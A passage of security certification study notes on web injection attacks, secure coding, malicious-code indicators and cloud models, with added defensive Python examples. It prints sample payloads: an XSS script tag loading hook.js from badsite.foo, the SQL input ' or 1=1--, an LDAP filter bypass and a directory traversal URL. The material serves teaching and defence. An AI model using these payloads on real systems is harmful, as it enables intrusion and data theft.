■ Check out this amazing <a href="https://trusted.foo">website</a><script src="https://badsite.foo/hook.js"></script>.
○ Users viewing the post will have the malicious script hook.js execute in
their browser.
● A third type of XSS attack exploits vulnerabilities in client-side scripts.
○ Such scripts often use the Document Object Model (DOM) to modify the
content and layout of a web page.
○ For example, the "document.write" method enables a page to take some
user input and modify the page accordingly.
○ An exploit against a client-side script could work as follows:
■ The attacker identifies an input validation vulnerability in the trusted
site. For example, a message board might take the user's name
from an input text box and show it in a header.
https://trusted.foo/messages?user=james
■ The attacker crafts a URL to modify the parameters of a script that
the server will return, such as:
https://trusted.foo/messages?user=James%3Cscript%20src%3D%22https%3A%2F%2Fbadsite.foo%2Fhook.js%22%3E%3C%2Fscript%3E
■ The server returns a page with the legitimate DOM script
embedded, but containing the parameter:
James<script src="https://badsite.foo/hook.js"></script>
■ The browser renders the page using the DOM script, adding the
text "James" to the header, but also executing the hook.js script at
the same time.

Structured Query Language Injection Attacks


● A server-side attack causes the server to do some processing or run a script or
query in a way that is not authorized by the application design.
○ Most server-side attacks depend on some kind of injection attack.
● In a SQL injection attack, the threat actor modifies one or more of the four
basic database operations listed below by adding code to some input accepted by
the app, causing it to execute the attacker's own set of SQL queries or parameters.
○ The main database operations are performed by SQL statements for
selecting data (SELECT), inserting data (INSERT), deleting data
(DELETE), and updating data (UPDATE).
● If a threat actor enters the string ' or 1=1-- and this input is not sanitized, the
following malicious query will be executed:
○ SELECT * FROM tbl_user WHERE username = '' or 1=1--'
○ The logical statement 1=1 is always true, and the -- string turns the rest
of the statement into a comment, making it more likely that the web
application will parse this modified version and dump a list of all users.
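
The query above, built by string concatenation and then with a bound parameter, as an added example that is not part of the original notes. It uses Python's built-in sqlite3 module; the rows and the role column are constructed, and tbl_user is the table name from the notes.

```python
import sqlite3


def make_db():
    """Build an in-memory database holding constructed sample accounts."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tbl_user (username TEXT PRIMARY KEY, role TEXT)")
    db.executemany(
        "INSERT INTO tbl_user VALUES (?, ?)",
        [("alice", "admin"), ("bob", "user"), ("carol", "user")],
    )
    return db


def lookup_concatenated(db, username):
    """Vulnerable form: the input is pasted into the SQL text, so a quote
    or comment marker inside it changes the structure of the query."""
    query = "SELECT * FROM tbl_user WHERE username = '" + username + "'"
    return query, db.execute(query).fetchall()


def lookup_parameterized(db, username):
    """Hardened form: the ? placeholder sends the input as a bound value,
    so it is only ever compared with the username column."""
    query = "SELECT * FROM tbl_user WHERE username = ?"
    return query, db.execute(query, (username,)).fetchall()


# The input string given in the notes.
INPUT_FROM_NOTES = "' or 1=1--"

if __name__ == "__main__":
    db = make_db()
    for lookup in (lookup_concatenated, lookup_parameterized):
        query, rows = lookup(db, INPUT_FROM_NOTES)
        print(lookup.__name__, "|", query, "|", len(rows), "row(s)")
```

The concatenated form returns every row in tbl_user for the input from the notes, while the parameterized form returns none because no account has that literal username.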

XML and LDAP Injection Attacks


● Extensible Markup Language (XML) Injection:
○ Extensible Markup Language (XML) is used by apps for authentication
and authorizations, and for other types of data exchange and uploading.
○ Data submitted via XML with no encryption or input validation is vulnerable
to spoofing, request forgery, and injection of arbitrary data or code.
● Lightweight Directory Access Protocol (LDAP) Injection:
○ LDAP is specifically used to read and write network directory databases.
○ A threat actor could exploit either unauthenticated access or a vulnerability
in a client app to submit arbitrary LDAP queries.
○ This could allow accounts to be created or deleted, or for the attacker to
change authorizations and privileges.
○ LDAP filters are constructed from (name=value) attribute pairs delimited
by parentheses and the logical operators AND (&) and OR (|).
○ Adding filter parameters as unsanitized input can bypass access controls.
■ For example, if a web form authenticates to an LDAP directory with
the valid credentials Bob and Pa$$w0rd, it may construct a query
such as this from the user input:
● (&(username=Bob)(password=Pa$$w0rd))
■ If the form input is not sanitized, a threat actor could bypass the
password check by entering a valid username plus an LDAP filter
string, such as Bob)(&)). This causes the password filter to be
dropped for a condition that is always true:
● (&(username=Bob)(&))
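
The filter construction above with and without escaping, as an added example that is not part of the original notes. The escaping follows RFC 4515; first_filter is a hypothetical helper that models, as an assumption taken from the notes, a directory that evaluates the first complete filter and ignores whatever follows it.

```python
# RFC 4515: characters with meaning inside a search filter are replaced
# by a backslash and their two-digit hex code.
LDAP_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def escape_filter_value(value):
    """Escape one user-supplied value for use inside an LDAP filter."""
    return "".join(LDAP_ESCAPES.get(ch, ch) for ch in value)


def build_filter_unsafe(username, password):
    """Vulnerable form: raw input is placed between the parentheses."""
    return f"(&(username={username})(password={password}))"


def build_filter_safe(username, password):
    """Hardened form: both values are escaped before the filter is built."""
    return (
        f"(&(username={escape_filter_value(username)})"
        f"(password={escape_filter_value(password)}))"
    )


def first_filter(text):
    """Return the first balanced filter in text, or None if unbalanced.
    Assumption: this is the part a lenient server would evaluate."""
    depth = 0
    for i, ch in enumerate(text):
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                return text[: i + 1]
            if depth < 0:
                return None
    return None


def password_check_survives(filter_text):
    """True if the evaluated filter still contains the password clause."""
    evaluated = first_filter(filter_text)
    return evaluated is not None and "(password=" in evaluated


# The username input given in the notes; the password value is constructed.
INPUT_FROM_NOTES = "Bob)(&))"

if __name__ == "__main__":
    for build in (build_filter_unsafe, build_filter_safe):
        built = build(INPUT_FROM_NOTES, "anything")
        print(build.__name__, built, password_check_survives(built))
```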

Directory Traversal and Command Injection Attacks


● Directory Traversal: The threat actor submits a request for a file outside the web
server's root directory by submitting a path to navigate to the parent directory
(../).
○ This attack can succeed if the input is not filtered properly and access
permissions on the file are the same as those on the web server directory.
● The threat actor might use a canonicalization attack to disguise the nature of
the malicious input.
○ Canonicalization refers to the way the server converts between the
different methods by which a resource (such as a file path or URL) may be
represented and submitted to the simplest (or canonical) method used by
the server to process the input.
○ An attacker might be able to exploit vulnerabilities in the canonicalization
process to perform code injection or facilitate directory traversal.
○ For example, to perform a directory traversal attack, the attacker might
submit a URL such as:
■ http://victim.foo/?show=../../../../etc/config
● A command injection attack attempts to cause the server to run OS shell
commands and return the output to the browser.
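
One way to apply canonicalization defensively against directory traversal, as an added example that is not part of the original notes: decode once, resolve the path to its canonical form, then check that it is still inside the web root. The function names, the temporary directory layout and the requests other than the one from the notes are constructed, and a POSIX file system is assumed.

```python
import os
import tempfile
from urllib.parse import unquote


def resolve_under_root(web_root, requested):
    """Return the canonical path for `requested` if it stays inside
    web_root, otherwise None."""
    decoded = unquote(requested)
    # Input that still changes when decoded again was encoded twice;
    # reject it rather than guess what a later layer would make of it.
    if unquote(decoded) != decoded or "\x00" in decoded:
        return None
    root = os.path.realpath(web_root)
    # realpath collapses ../ sequences and follows symbolic links, so the
    # comparison below is made on the path that would really be opened.
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/")))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


CONSTRUCTED_REQUESTS = [
    "docs/readme.txt",               # ordinary request
    "docs/../index.html",            # odd but stays inside the root
    "../../../../etc/config",        # value from the URL in the notes
    "%2e%2e%2f%2e%2e%2fetc/config",  # same idea, percent encoded
    "%252e%252e%252fetc/config",     # encoded twice
]


def run_constructed_cases():
    """Resolve each constructed request against a temporary web root and
    return {request: path relative to the root, or None if rejected}."""
    results = {}
    with tempfile.TemporaryDirectory() as base:
        root = os.path.join(base, "webroot")
        outside = os.path.join(base, "outside")
        os.makedirs(os.path.join(root, "docs"))
        os.makedirs(outside)
        requests = list(CONSTRUCTED_REQUESTS)
        try:
            # A link inside the root that points outside it.
            os.symlink(outside, os.path.join(root, "linked"))
            requests.append("linked/secret.txt")
        except OSError:
            pass  # symlinks unavailable; skip that case
        canonical_root = os.path.realpath(root)
        for req in requests:
            path = resolve_under_root(root, req)
            results[req] = (
                None if path is None else os.path.relpath(path, canonical_root)
            )
    return results


if __name__ == "__main__":
    for request, outcome in run_constructed_cases().items():
        print(f"{request!r:35} -> {outcome}")
```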

Server-Side Request Forgery


● A server-side request forgery (SSRF) causes the server application to process
an arbitrary request that targets another service, either on the same host or a
different one.
● SSRF exploits both the lack of authentication between the internal servers and
services (implicit trust) and weak input validation, allowing the attacker to submit
unsanitized requests or API parameters.
● Many SSRF attacks depend on exploits against specific parsing mechanisms in
standard libraries for web servers, such as Apache or IIS, and web application
programming languages and tools, such as the curl library, Java, and PHP.
● SSRF can also use XML injection to exploit weaknesses in XML document
parsing.


● SSRF encompasses a very wide range of potential exploits and targets, some of
which include:
○ Reconnaissance—a response may contain metadata describing the type
and configuration of internal servers. SSRF can also be used to port scan
within the internal network.
○ Credential stealing—a response may contain an API key that the internal
servers use between themselves.
○ Unauthorized requests—the server-initiated request might change data or
access a service in an unauthorized way.
○ Protocol smuggling—despite initially being carried over HTTP, the SSRF
might target an internal SMTP or FTP server.

Secure Coding Techniques


● Some of the most important coding practices are input validation, output
encoding, and error handling.
● Input Validation:
○ A primary vector for attacking applications is to exploit faulty input
validation.
○ Input could include user data entered into a form or URL, or data passed by
another application as a URL or HTTP header.
○ Malicious input could be crafted to perform an overflow attack or some
type of script or SQL injection attack.
○ To mitigate this risk, all input methods should be documented with a view
to reducing the potential attack surface exposed by the application.
● Normalization and Output Encoding:
○ Where an application accepts string input, the input should be subjected to
normalization procedures before being accepted.
○ Normalization means that a string is stripped of illegal characters or
substrings and converted to the accepted character set.
○ This ensures that the string is in a format that can be processed correctly
by the input validation routines.
○ Output encoding means that the string is re-encoded safely for the
context in which it is being used.
■ For example, a web form might perform input validation at the
client, but when it reaches the server, a PHP function performs
output encoding before composing an SQL statement.

Server-Side Versus Client-Side Validation


● A web application (or any other client-server application) can be designed to
perform code execution and input validation locally (on the client) or remotely (on
the server).
○ An example of client-side execution is a document object model (DOM)
script to render the page using dynamic elements from user input.
● The main issue with client-side validation is that the client will always be more
vulnerable to some sort of malware interfering with the validation process.
● The main issue with server-side validation is that it can be time-consuming, as it
may involve multiple transactions between the server and client.

Web Application Security


● Secure Cookies:
○ Cookies can be a vector for session hijacking and data exposure if not
configured correctly.
○ Some of the key parameters for the Set-Cookie header are:
■ Avoid using persistent cookies for session authentication. Always
use a new cookie when the user reauthenticates.
■ Set the Secure attribute to prevent a cookie being sent over
unencrypted HTTP.
■ Set the HttpOnly attribute to make the cookie inaccessible to
document object model/client-side scripting.
■ Use the SameSite attribute to control from where a cookie may be
sent, mitigating request forgery attacks.
● Response Headers:
○ A number of security options can be set in the response header returned
by the server to the client.
○ Some of the most important security-relevant header options are:
■ HTTP Strict Transport Security (HSTS)—forces browser to connect
using HTTPS only, mitigating downgrade attacks, such as SSL
stripping.
■ Content Security Policy (CSP)—mitigates clickjacking, script
injection, and other client-side attacks.
■ Cache-Control—sets whether the browser can cache responses.
Preventing caching of data protects confidential and personal
information where the client device might be shared by multiple
users.
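
The cookie attributes and response headers listed above, turned into an audit check, as an added example that is not part of the original notes. Both sample responses and the finding texts are constructed, and the check assumes the response was served over HTTPS and carries a session cookie and confidential data.

```python
def parse_set_cookie(value):
    """Split a Set-Cookie value into (name, value, attributes), with the
    attribute names lower-cased."""
    first, *rest = [part.strip() for part in value.split(";")]
    name, _, cookie_value = first.partition("=")
    attrs = {}
    for part in rest:
        if part:
            key, _, attr_value = part.partition("=")
            attrs[key.strip().lower()] = attr_value.strip()
    return name.strip(), cookie_value, attrs


def audit_response(headers):
    """headers is a list of (name, value) pairs. Returns a list of findings;
    an empty list means every check in the notes passed."""
    findings = []
    present = {name.lower(): value for name, value in headers}
    for name, value in headers:
        if name.lower() != "set-cookie":
            continue
        cookie, _, attrs = parse_set_cookie(value)
        if "secure" not in attrs:
            findings.append(f"{cookie}: missing Secure")
        if "httponly" not in attrs:
            findings.append(f"{cookie}: missing HttpOnly")
        if attrs.get("samesite", "").lower() not in ("strict", "lax"):
            findings.append(f"{cookie}: SameSite not Strict or Lax")
        if "expires" in attrs or "max-age" in attrs:
            findings.append(f"{cookie}: persistent (Expires/Max-Age set)")
    if "strict-transport-security" not in present:
        findings.append("response: missing Strict-Transport-Security")
    if "content-security-policy" not in present:
        findings.append("response: missing Content-Security-Policy")
    if "no-store" not in present.get("cache-control", "").lower():
        findings.append("response: Cache-Control allows caching")
    return findings


# Constructed sample responses: the weak settings beside the corrected ones.
WEAK_RESPONSE = [
    ("Set-Cookie", "sessionid=abc123; Path=/; Max-Age=31536000"),
    ("Cache-Control", "public, max-age=600"),
]
HARDENED_RESPONSE = [
    ("Set-Cookie", "sessionid=abc123; Path=/; Secure; HttpOnly; SameSite=Strict"),
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
    ("Content-Security-Policy", "default-src 'self'; frame-ancestors 'none'"),
    ("Cache-Control", "no-store"),
]

if __name__ == "__main__":
    for label, response in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_response(response))
```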

Data Exposure and Memory Management


● Data exposure is a fault that allows privileged information (such as a token,
password, or personal data) to be read without being subject to the appropriate
access controls.
● Error Handling:
○ A well-written application must be able to handle errors and exceptions
gracefully.
○ This means that the application performs in a controlled way when
something unpredictable happens.
○ An error or exception could be caused by invalid user input, a loss of
network connectivity, another server or process failing, and so on.
○ Ideally, the programmer will have written a structured exception handler
(SEH) to dictate what the application should then do.
■ The main goal must be for the application not to fail in a way that
allows the attacker to execute code or perform some sort of
injection attack.
● Memory Management:
○ Many arbitrary code attacks depend on the target application having faulty
memory management procedures.
○ This allows the attacker to execute his or her own code in the space
marked out by the target application.

Secure Code Usage


● A program may make use of existing code in the following ways:
○ Code reuse—using a block of code from elsewhere in the same
application or from another application to perform a different function (or
perform the same function in a different context).
■ The risk here is that the copy and paste approach causes the
developer to overlook potential vulnerabilities (perhaps the
function's input parameters are no longer validated in the new
context).
○ Third-party library—using a binary package (such as a dynamic link
library) that implements some sort of standard functionality, such as
establishing a network connection or performing cryptography.
○ Software development kit (SDK)—using sample code or libraries of
pre-built functions from the programming environment used to create the
software or interact with a third-party API.
○ Stored procedures—using a pre-built function to perform a database
query.
■ A stored procedure is a part of a database that executes a custom
query. The procedure is supplied an input by the calling program
and returns a predefined output for matched records.

Other Secure Coding Practices


● Unreachable Code and Dead Code:
○ Unreachable code is a part of application source code that can never be
executed.
■ For example, there may be a routine within a logic statement (If ...
Then) that can never be called because the conditions that would
call it can never be met.
○ Dead code can be described as either code that is executed but has no
effect on the program flow or code that will never be executed.
■ For example, there may be code to perform a calculation, but the
result is never stored as a variable or used to evaluate a condition.
● Obfuscation/Camouflage:
○ Code can be made difficult to analyze by using an obfuscator, which is
software that randomizes the names of variables, constants, functions,
and procedures, removes comments and white space, and performs other
operations to make the compiled code physically and mentally difficult to
read and follow.

Static Code Analysis


● Static code analysis (or source code analysis) is performed against the
application code before it is packaged as an executable process.
● The analysis tool will typically identify each line in a sequence of code that
creates the vulnerability and provide generic remediation advice, such as
ensuring that input for an SQL function is sanitized before use.
● Human analysis of software source code is described as a manual code review.

Dynamic Code Analysis


● Static code review techniques will not reveal vulnerabilities that might exist in the
runtime environment, such as exposure to race conditions or unexpected user
input.
● Dynamic analysis means that the application is tested under "real world"
conditions using a staging environment.
● Fuzzing:
○ A dynamic code analysis technique that involves sending a running
application random and unusual input so as to evaluate how the app
responds.
○ This is a form of "stress testing" that can reveal how robust the
application is.
● There are generally three types of fuzzers, representing different ways of
injecting manipulated input into the application:
○ Application UI—identify input streams accepted by the application, such
as input boxes, command line switches, or import/export functions.
○ Protocol—transmit manipulated packets to the application, perhaps using
unexpected values in the headers or payload.
○ File format—attempt to open files whose format has been manipulated,
perhaps manipulating specific features of the file.

Scripting
● Automation using scripting means that each configuration or build task is
performed by a block of code.
● A script will use the following elements:
○ Parameters that the script takes as input data (passed to the script as
arguments).
○ Branching and looping statements that can alter the flow of execution
based on logic conditions.
○ Validation and error handlers to check inputs and ensure robust execution.
○ Unit tests to ensure that the script returns the expected outputs, given the
expected inputs.

Python Script Environment


● Python is a popular language for implementing all kinds of development projects,
including automation tools and security tools, as well as malicious scripts.
● Where many languages use brackets to denote blocks of code, Python uses
indentation (4 spaces per level, by convention).
● Variables:
○ Python uses the = operator to assign a value to a variable.
○ Variables are not declared with a data type, such as string or integer, but
Python is strongly typed, meaning that you cannot add an integer variable
to a string variable, for instance.
● Functions:
○ Functions are used to produce modular, reusable code.
○ A function takes some arguments as parameters, performs some
processing, and typically returns some output.
● Logic and Looping Statements:
○ Branching and looping statements let you test conditions and perform
repetitive actions using compact code.
● Modules:
○ A Python module is a library of functions for accomplishing standard tasks,
such as opening a network socket or interacting with an operating
system's API.

PowerShell Script Environments


● PowerShell is the preferred method of performing Windows administration tasks.
● It has also become the Windows hacker's go-to toolkit.
● Cmdlets and Functions:
○ Most PowerShell usage is founded on cmdlets.
○ A cmdlet is a compiled library that exposes some configuration or
administrative task, such as starting a VM in Hyper-V.
● Logic and Looping Statements:
○ PowerShell supports a wider range of branching and looping structures
than Python, including the switch and do statements.
● Modules:
○ PowerShell can also be used with a large number of modules, which are
added to a script using the Import-Module cmdlet.

Execution Control
● Execution control is the process of determining what additional software or
scripts may be installed or run on a host beyond its baseline.
● Allow and Block Lists:
○ Execution control can be implemented as either an allow list or a block list.
○ An allow list is a highly restrictive policy under which only authorized
processes and scripts can run.
■ Allowing only specific applications that have been added to a list
will inevitably hamper users at some point and increase support
time and costs.
○ A block list is a permissive policy that only prevents execution of listed
processes and scripts.
● Code Signing:
○ Code signing is the principal means of proving the authenticity and
integrity of code (an executable or a script).
○ The developer creates a cryptographic hash of the file then signs the hash
using his or her private key.
● OS-Based Execution Control:
○ Software Restriction Policies (SRP)—available for most versions and
editions of Windows, SRP can be configured as group policy objects
(GPOs) to passlist file system locations from which executables and
scripts can launch.
○ AppLocker—improves configuration options and default usage of SRP.
○ Windows Defender Application Control (WDAC)—formerly Device Guard,
this can be used to create Code Integrity (CI) policies, which can be used
on their own or in conjunction with AppLocker.
■ CI policies can be based on version-aware and publisher digital
signatures, as well as image hashes and/or file paths. WDAC is a
useful option for preventing administrator accounts from disabling
execution control options.
● In Linux, execution control is normally enforced by using a mandatory access
control (MAC) kernel module or Linux Security Module (LSM).

Malicious Code Indicators


● If you are performing threat hunting or observing malware in a sandbox, it is
helpful to consider the main types of malicious activity:
○ Shellcode—this is a minimal program designed to exploit a buffer overflow
or similar vulnerability to gain privileges, or to drop a backdoor on the host
if run as a Trojan.
○ Credential dumping—the malware might try to access the credentials file
(SAM on a local Windows workstation) or sniff credentials held in memory
by the lsass.exe system process.
○ Lateral movement/insider attack—the general procedure is to use the
foothold to execute a process remotely, using a tool such as psexec or
PowerShell.
○ Persistence—this is a mechanism that allows the threat actor's backdoor
to restart if the host reboots or the user logs off.

PowerShell Malicious Indicators


● Cmdlets such as Invoke-Expression, Invoke-Command, Invoke-WMIMethod,
New-Service, Create-Thread, Start-Process, and New-Object can indicate an
attempt to run some type of binary shellcode.
● Bypassing execution policy can also act as an indicator. The PowerShell code
may be called as a Base64 encoded string (-enc argument) or may use the
-noprofile or -ExecutionPolicy Bypass arguments.
● Using system calls to the Windows API might indicate an attempt to inject a DLL
or perform process hollowing, where the malicious code takes over a legitimate
process.
● Using another type of script to execute the PowerShell is also suspicious. For
example, the attacker might use JavaScript code embedded in a PDF to launch
PowerShell via a vulnerable reader app.
● The big problem with PowerShell indicators is distinguishing them from legitimate
behavior. The following techniques can be used to assist with this:
○ Use group policy to restrict execution of PowerShell to trusted accounts
and hosts.
○ Use group policy execution control to run scripts only from trusted
locations.
○ Consider use of Constrained Language Mode
(devblogs.microsoft.com/powershell/powershell-constrained-language-mode)
and signed scripts to limit the ability of exploit code to run on
high-value target systems.
○ Prevent the use of old PowerShell versions to mitigate the use of a downgrade
attack to bypass access controls.
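
Detection logic for the command-line indicators listed above, run over logged process command lines, as an added example that is not part of the original notes. The finding names, the helper names and both sample command lines are constructed; the encoded sample carries a harmless Write-Output script.

```python
import base64
import binascii
import re

# Cmdlet names taken from the list in the notes above.
WATCHED_CMDLETS = [
    "Invoke-Expression", "Invoke-Command", "Invoke-WMIMethod",
    "New-Service", "Create-Thread", "Start-Process", "New-Object",
]


def is_param(token, full_name, min_len, aliases=()):
    """powershell.exe accepts abbreviated parameter names, so a token
    matches when it is a long enough prefix of the full name."""
    if len(token) < 2 or token[0] not in "-/":
        return False
    name = token[1:].lower()
    return name in aliases or (len(name) >= min_len and full_name.startswith(name))


def decode_encoded_command(value):
    """The -enc argument carries Base64 of UTF-16LE text. Returns the
    decoded script, or None if the value is not valid."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyze_command_line(cmdline):
    """Return the indicators found in one command line, plus the decoded
    script when an encoded command is present."""
    tokens = cmdline.split()
    findings, decoded = [], None
    for i, tok in enumerate(tokens):
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        if is_param(tok, "encodedcommand", 1, ("ec",)):
            findings.append("encoded-command")
            decoded = decode_encoded_command(nxt)
            if decoded is None:
                findings.append("encoded-command-undecodable")
        elif is_param(tok, "executionpolicy", 2, ("ep",)) and nxt.lower() == "bypass":
            findings.append("execution-policy-bypass")
        elif is_param(tok, "noprofile", 3):
            findings.append("no-profile")
    # Search the visible command line and the decoded script together.
    searchable = cmdline + "\n" + (decoded or "")
    for cmdlet in WATCHED_CMDLETS:
        if re.search(re.escape(cmdlet), searchable, re.IGNORECASE):
            findings.append("cmdlet:" + cmdlet)
    return {"findings": findings, "decoded": decoded}


def encode_for_sample(script):
    """Build the Base64 form used by -enc, for the constructed sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples: one routine admin call, one carrying the indicators.
SAMPLE_SCRIPT = "Invoke-Expression 'Write-Output constructed-sample'"
ROUTINE_CMDLINE = r"powershell.exe -File C:\Scripts\backup.ps1"
FLAGGED_CMDLINE = (
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -enc "
    + encode_for_sample(SAMPLE_SCRIPT)
)

if __name__ == "__main__":
    for line in (ROUTINE_CMDLINE, FLAGGED_CMDLINE):
        print(analyze_command_line(line))
```

As the notes say, these indicators also appear in legitimate administration, so the findings are a starting point for triage rather than a verdict.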

Bash and Python Malicious Indicators


● In Linux, the command line is usually Bourne Again Shell (Bash).
● A malicious script running on a Linux host might attempt the following:
○ Use commands such as whoami and ifconfig/ip/route to establish the local
context.
○ Download tools, possibly using wget or curl.
○ Add crontab entries to enable persistence.
○ Add a user with full sudo privileges and enable remote access via SSH.
○ Change firewall rules using iptables.
○ Use tools such as Nmap to scan for other hosts.
● Reverse Shell:
○ A maliciously spawned remote command shell where the victim host
opens the connection to the attacking host.

Macros and Visual Basic For Applications (VBA)


● A document macro is a sequence of actions performed in the context of a word
processor, spreadsheet, or presentation file.
● Microsoft Office uses the Visual Basic for Applications (VBA) language, while
PDF documents use JavaScript.
● A malicious actor will try to use a macro-enabled document to execute arbitrary
code.
○ For example, a Word document could be the vector for executing a
malicious PowerShell script.

Man-In-The-Browser Attack
● A man-in-the-browser (MitB) attack is a specific type of on-path attack where
the web browser is compromised.
● Depending on the level of privilege obtained, the attacker may be able to inspect
session cookies, certificates, and data, change browser settings, perform
redirection, and inject code.
● A MitB attack may be accomplished by installing malicious plug-ins or scripts or
intercepting calls between the browser process and DLLs.

Application Development, Deployment, and Automation


● Automation is the completion of an administrative task without human
intervention.
○ Task automation steps may be configurable through a GUI control panel,
via a command line, or via an API called by scripts.

Secure Application Development Environments


● A software development life cycle (SDLC) divides the creation and
maintenance of software into discrete phases.
○ There are two principal SDLCs: the waterfall model and Agile
development.
○ Both these models stress the importance of requirements analysis and
quality processes to the success of development projects.
● Quality Assurance (QA):
○ QC procedures are themselves defined by a quality assurance (QA)
process, which analyzes what constitutes "quality" and how it can be
measured and checked.
● Development Environments:

Provisioning, Deprovisioning, and Version Control


● Provisioning:
○ The process of deploying an application to the target environment, such
as enterprise desktops, mobile devices, or cloud infrastructure.
● Deprovisioning:
○ The process of removing an application from packages or instances.
○ This might be necessary if software has to be completely rewritten or no
longer satisfies its purpose.
● Version Control:
○ The practice of ensuring that the assets that make up a project are closely
managed when it comes time to make changes.
○ Version control supports the change management process for software
development projects.

Automation/Scripting Release Paradigms


● Continuous Integration:
○ Software development method in which code updates are tested and
committed to a development or build server/code repository rapidly.
● Continuous Delivery:
○ Where CI is about managing code in development, continuous delivery
is about testing all of the infrastructure that supports the app, including
networking, database functionality, client software, and so on.
● Continuous Deployment:
○ Software development method in which app and platform updates are
committed to production rapidly.
● Continuous Monitoring and Automated Courses of Action:
○ An automation solution will have a system of continuous monitoring to
detect service failures and security incidents.
○ Continuous monitoring might use a locally installed agent or heartbeat
protocol or may involve checking availability remotely.
● Continuous Validation:
○ The requirements model is tested using processes of verification and
validation (V&V):
■ Verification is a compliance testing process to ensure that the
product or system meets its design goals.
■ Validation is the process of determining whether the application is
fit-for-purpose (so for instance, its design goals meet the user
requirements).

Software Diversity
● An application's runtime environment will use one of two approaches for
execution on a host system:
○ Compiled code is converted to binary machine language that can run
independently on the target OS.
○ Interpreted code is packaged pretty much as is but is compiled line-by-line
by an interpreter, such as PowerShell or JavaScript.
● Software diversity can refer to obfuscation techniques to make code difficult to
detect as malicious.
○ This is widely used by threat actors in the form of shellcode compilers to
avoid signature detection, such as the venerable Shikata Ga Nai.
○ This can be used as a defensive technique. Obfuscating API methods and
automation code makes it harder for a threat actor to reverse engineer
and analyze the code to discover weaknesses.

Lesson 15: Implementing Secure Cloud Solutions


Cloud Deployment Models
● A cloud deployment model classifies how the service is owned and
provisioned.
● Cloud deployment models can be broadly categorized as follows:
○ Public (or multi-tenant)—a service offered over the Internet by cloud
service providers (CSPs) to cloud consumers.
■ Multi-cloud architectures are where an organization uses services from
multiple CSPs.
○ Hosted Private—hosted by a third party for the exclusive use of the organization.
○ Private—cloud infrastructure that is completely private to and owned by the
organization.
■ With private cloud computing, organizations can exercise greater control
over the privacy and security of their services.
○ Community—this is where several organizations share the costs of either a
hosted private or fully private cloud.
■ This is usually done in order to pool resources for a common concern, like
standardization and security policies.

Cloud Service Models


● These models are referred to as something or anything as a service (XaaS).
● Infrastructure as a service (IaaS) is a means of provisioning IT resources such
as servers, load balancers, and storage area network (SAN) components quickly.
● Software as a service (SaaS) is a different model of provisioning software
applications. Rather than purchasing software licenses for a given number of
seats, a business would access software hosted on a supplier's servers on a
pay-as-you-go or lease arrangement (on-demand).
● Platform as a service (PaaS) provides resources somewhere between SaaS
and IaaS.
○ A typical PaaS solution would provide servers and storage network
infrastructure (as per IaaS) but also provide a multi-tier web
application/database platform on top.

Anything as a Service
● Security in the cloud covers the things you must take responsibility for; security of the
cloud covers the things the CSP manages.

Security as a Service
● You can classify such support in three general "tiers":
○ Consultants—the experience and perspective of a third-party professional
can be hugely useful in improving security awareness and capabilities in
any type of organization (small to large).
○ Managed Security Services Provider (MSSP)—a means of fully
outsourcing responsibility for information assurance to a third party.
■ This type of solution is expensive but can be a good fit for an SMB
that has experienced rapid growth and has no in-house security
capability.
○ Security as a Service (SECaaS)—can mean lots of different things, but is
typically distinguished from an MSSP as being a means of implementing a
particular security control, such as virus scanning or SIEM-like
functionality, in the cloud.
■ For example, an antivirus agent would scan files locally but be
managed and updated from the cloud provider.

Virtualization Technologies and Hypervisor Types


● Virtualization means that multiple operating systems can be installed and run
simultaneously on a single computer.
● A virtual platform requires at least three components:
○ Host hardware—the platform that will host the virtual environment.
Optionally, there may be multiple hosts networked together.
○ Hypervisor/Virtual Machine Monitor (VMM)—manages the virtual machine
environment and facilitates interaction with the computer hardware and
network.
○ Guest operating systems, Virtual Machines (VM), or instances—
operating systems installed under the virtual environment.

Virtual Desktop Infrastructure and Thin Clients


● Virtual desktop infrastructure (VDI) refers to using a VM as a means of
provisioning corporate desktops.
● When the thin client starts, it boots a minimal OS, allowing the user to log on to a
VM stored on the company server infrastructure.
● The user makes a connection to the VM using some sort of remote desktop
protocol (Microsoft Remote Desktop or Citrix ICA, for instance).
● All application processing and data storage in the virtual desktop environment
(VDE) or workspace is performed by the server.
○ The thin client computer must only be powerful enough to display the
screen image, play audio, and transfer mouse and key commands and video
and audio information over the network.
● The main disadvantage is that in the event of a failure in the server and network
infrastructure, users have no local processing ability, so downtime events may be
more costly in terms of lost productivity.

Application Virtualization and Container Virtualization


● Application virtualization is a more limited type of VDI.
● Rather than run the whole client desktop as a virtual platform, the client either
accesses an application hosted on a server or streams the application from the
server to the client for local processing.
● Application cell/container virtualization dispenses with the idea of a hypervisor
and instead enforces resource separation at the operating system level.
○ The OS defines isolated "cells" for each user instance to run in. Each cell
or container is allocated CPU and memory resources, but the processes
all run through the native OS kernel.

VM Escape Protection
● VM escaping refers to malware running on a guest OS jumping to another guest
or to the host.
● The classic timing attack is to send multiple usernames to an authentication
server and measure the server response times.
○ An invalid username will usually be rejected very quickly, but a valid one
will take longer (while the authentication server checks the password).
● Preventing VM escaping is dependent on the virtualization vendor identifying
security vulnerabilities in the hypervisor and on these being patched.

VM Sprawl Avoidance
● Each VM needs to be installed with its own security software suite to protect
against malware and intrusion attempts.
● Although one of the primary benefits of virtualization is the ease of deploying new
systems, this type of system sprawl and deployment of undocumented assets
can also be the root of security issues.
● Virtual machine life cycle management (VMLM) software can be deployed to
enforce VM sprawl avoidance.
○ VMLM solutions provide you with a centralized dashboard for maintaining
and monitoring all the virtual environments in your organization.

Cloud Security Integration and Auditing


● Where indicators of on-premises attacks are found in local application logs and
network traffic, indicators of cloud-based attacks are found in API logs and
metrics.

Cloud Security Controls


● A third-party solution would typically be installed as a virtual instance within the
cloud.
○ For example, you might prefer to run a third-party next-generation firewall.
● Application Security and IAM
○ Application security in the cloud refers both to the software development
